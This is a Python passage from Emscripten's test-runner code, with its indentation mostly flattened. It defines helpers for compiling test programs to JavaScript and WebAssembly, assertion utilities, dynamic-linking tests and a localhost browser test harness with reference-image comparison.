def hardcode_arguments(self, filename, args):
    # Hardcode the arguments, so the generated js is portable without manual command-line arguments
if not args:
return
js = open(filename).read()
create_test_file(filename, js.replace('run();', 'run(%s + Module["arguments"]);' % str(args)))
def prep_ll_run(self, filename, ll_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.o.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
if force_recompile or build_ll_hook:
if ll_file.endswith(('.bc', '.o')):
if ll_file != filename + '.o':
shutil.copy(ll_file, filename + '.o')
Building.llvm_dis(filename)
else:
shutil.copy(ll_file, filename + '.o.ll')
fix_target(filename + '.o.ll')
if build_ll_hook:
need_post = build_ll_hook(filename)
Building.llvm_as(filename)
shutil.move(filename + '.o.ll', filename + '.o.ll.pre') # for comparisons later
Building.llvm_dis(filename)
if build_ll_hook and need_post:
build_ll_hook(filename)
Building.llvm_as(filename)
shutil.move(filename + '.o.ll', filename + '.o.ll.post') # for comparisons later
Building.llvm_dis(filename)
Building.llvm_as(filename)
else:
if ll_file.endswith('.ll'):
safe_copy(ll_file, filename + '.o.ll')
fix_target(filename + '.o.ll')
Building.llvm_as(filename)
else:
safe_copy(ll_file, filename + '.o')
def get_emcc_args(self):
# TODO(sbc): We should probably unify Building.COMPILER_TEST_OPTS and self.emcc_args
return self.serialize_settings() + self.emcc_args + Building.COMPILER_TEST_OPTS
# Generate JS from ll
def ll_to_js(self, filename):
Building.emcc(filename + '.o', self.get_emcc_args(), filename + '.o.js')
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in [filename] + additional_files:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except:
pass
args = [PYTHON, EMCC] + self.get_emcc_args() + \
['-I', dirname, '-I', os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
Building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_run(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
self.ll_to_js(filename)
else:
# "fast", new path: just call emcc and go straight to JS
all_files = [filename] + additional_files + libraries
for i in range(len(all_files)):
if '.' not in all_files[i]:
shutil.move(all_files[i], all_files[i] + '.bc')
all_files[i] += '.bc'
args = [PYTHON, EMCC] + self.get_emcc_args() + \
['-I', dirname, '-I', os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def validate_asmjs(self, err):
m = re.search(r"asm.js type error: '(\w+)' is not a (standard|supported) SIMD type", err)
if m:
# Bug numbers for missing SIMD types:
bugs = {
'Int8x16': 1136226,
'Int16x8': 1136226,
'Uint8x16': 1244117,
'Uint16x8': 1244117,
'Uint32x4': 1240796,
'Float64x2': 1124205,
}
simd = m.group(1)
if simd in bugs:
print(("\nWARNING: ignoring asm.js type error from {} due to implementation not yet available in SpiderMonkey." +
" See https://bugzilla.mozilla.org/show_bug.cgi?id={}\n").format(simd, bugs[simd]), file=sys.stderr)
err = err.replace(m.group(0), '')
# check for asm.js validation
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print("[was asm.js'ified]", file=sys.stderr)
# check for an asm.js validation error, if we expect one
elif 'asm.js' in err and not self.is_wasm() and self.get_setting('ASM_JS') == 1:
self.fail("did NOT asm.js'ify: " + err)
err = '\n'.join([line for line in err.split('\n') if 'uccessfully compiled asm.js code' not in line])
return err
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
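  # For example (illustrative): given src = 'function foo(a){return a;} function bar(){}',
  # get_func(src, 'foo') returns 'function foo(a){return a;}' by balancing braces.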
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_generated_code(self, engine, filename, args=[], check_timeout=True, output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
# Make sure that we produced proper line endings to the .js file we are about to run.
self.assertEqual(line_endings.check_line_endings(filename), 0)
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
with chdir(self.get_dir()):
jsrun.run_js(filename, engine, args, check_timeout,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and self.get_setting('ASM_JS') == 1:
err = self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
assert 'strict warning:' not in ret, 'We should pass all strict mode checks: ' + ret
if EMTEST_VERBOSE:
      print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2)
def assertIdentical(self, values, y):
if type(values) not in [list, tuple]:
values = [values]
for x in values:
if x == y:
return # success
self.fail("Expected to have '%s' == '%s', diff:\n\n%s" % (
limit_size(values[0]), limit_size(y),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(x.split('\n'), y.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
for value in values:
if value in string:
return # success
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')])),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
if not os.path.exists(ret):
os.makedirs(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args='help',
cache=True, env_init={}, cache_name_extra='', native=False):
if make_args == 'help':
make_args = ['-j', str(multiprocessing.cpu_count())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
hash_input = (str(Building.COMPILER_TEST_OPTS) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in Building.COMPILER_TEST_OPTS if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache is not None:
if cache and self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, copy_project=True, env_init=env_init,
native=native)
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
  # exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
  # when run under a browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default TOTAL_MEMORY=16MB is thus not enough
self.set_setting('TOTAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [PYTHON, EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
void bfunc();
void cfunc();
int _main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
self.emcc_args += ['--embed-file', '.@/']
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int _main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
      // FIXME for RTLD_LOCAL, binding symbols to a loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "_Z5bfuncv");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "_Z5cfuncv");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) == list
js_engines = [engine for engine in js_engines if engine and engine[0] not in [banned[0] for banned in self.banned_js_engines if banned]]
return js_engines
def do_run_from_file(self, src, expected_output, *args, **kwargs):
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=None, assert_identical=False):
if self.get_setting('ASYNCIFY') == 1 and self.is_wasm_backend():
self.skipTest("wasm backend doesn't support ASYNCIFY yet")
    if force_c or (main_file is not None and main_file[-2:] == '.c'):
basename = 'src.c'
Building.COMPILER = to_cc(Building.COMPILER)
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
if not no_build:
self.build(src, dirname, filename, main_file=main_file, additional_files=additional_files, libraries=libraries, includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
# Run in both JavaScript engines, if optimizing - significant differences there (typed arrays)
js_engines = self.filtered_js_engines(js_engines)
js_file = filename + '.o.js'
if len(js_engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
if len(js_engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in js_engines: # make sure to get asm.js validation checks, using sm
js_engines = [SPIDERMONKEY_ENGINE]
else:
js_engines = js_engines[:1]
for engine in js_engines:
# print 'test in', engine
js_output = self.run_generated_code(engine, js_file, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
else:
self.assertContained(expected_output, js_output)
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
# shutil.rmtree(dirname) # TODO: leave no trace in memory. But for now nice for debugging
if self.save_JS:
global test_index
self.hardcode_arguments(js_file, args)
shutil.copyfile(js_file, os.path.join(TEMP_DIR, str(test_index) + '.js'))
test_index += 1
# No building - just process an existing .ll file (or .bc, which we turn into .ll)
def do_ll_run(self, ll_file, expected_output=None, args=[], js_engines=None,
output_nicerizer=None, force_recompile=False,
build_ll_hook=None, assert_returncode=None):
filename = os.path.join(self.get_dir(), 'src.cpp')
self.prep_ll_run(filename, ll_file, force_recompile, build_ll_hook)
self.ll_to_js(filename)
self.do_run(None,
expected_output,
args,
no_build=True,
js_engines=js_engines,
output_nicerizer=output_nicerizer,
assert_returncode=assert_returncode)
def get_freetype_library(self):
self.set_setting('DEAD_FUNCTIONS', self.get_setting('DEAD_FUNCTIONS') + ['_inflateEnd', '_inflate', '_inflateReset', '_inflateInit2_'])
return self.get_library('freetype', os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared'])
def get_poppler_library(self):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
Building.COMPILER_TEST_OPTS += [
'-I' + path_from_root('tests', 'freetype', 'include'),
'-I' + path_from_root('tests', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
Building.COMPILER_TEST_OPTS += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
poppler = self.get_library(
'poppler',
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init={'FONTCONFIG_CFLAGS': ' ', 'FONTCONFIG_LIBS': ' '},
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library('zlib', os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header("Content-type", 'application/javascript')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', urllib.unquote_plus(self.path), ']')
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write('COMMAND:' + url)
# move us to the right place to serve the files
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write('(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', urllib.unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
    def log_request(self, code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
if not EMTEST_BROWSER:
print("Using default system browser")
else:
cmd = shlex.split(EMTEST_BROWSER)
def run_in_other_browser(url):
subprocess.Popen(cmd + [url])
webbrowser.open_new = run_in_other_browser
print("Using Emscripten browser: " + str(cmd))
cls.browser_timeout = 30
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
webbrowser.open_new('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
def run_browser(self, html_file, message, expectedResult=None, timeout=None):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
self.assertIdentical(expectedResult, output)
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, code):
return '#define EMTEST_PORT_NUMBER %d\n#include "%s"\n' % (self.port, path_from_root('tests', 'report_result.h')) + code
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
};
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
run_process([PYTHON, EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
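  # btest: compile the given test (a source string or a path under tests/)
  # with emcc plus the reporting harness, run the generated page in the
  # browser, and compare the reported result against `expected`, or against a
  # reference image (allowing an average per-channel pixel difference of up
  # to `reference_slack`).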
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
    original_args = args[:]
    # copy args so the `+=` below never mutates the caller's list (or the shared default)
    args = list(args)
if 'USE_PTHREADS=1' in args and not self.is_wasm_backend() and 'ALLOW_MEMORY_GROWTH=1' not in args:
if EMTEST_WASM_PTHREADS:
also_asmjs = True
elif 'WASM=0' not in args:
args += ['-s', 'WASM=0']
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
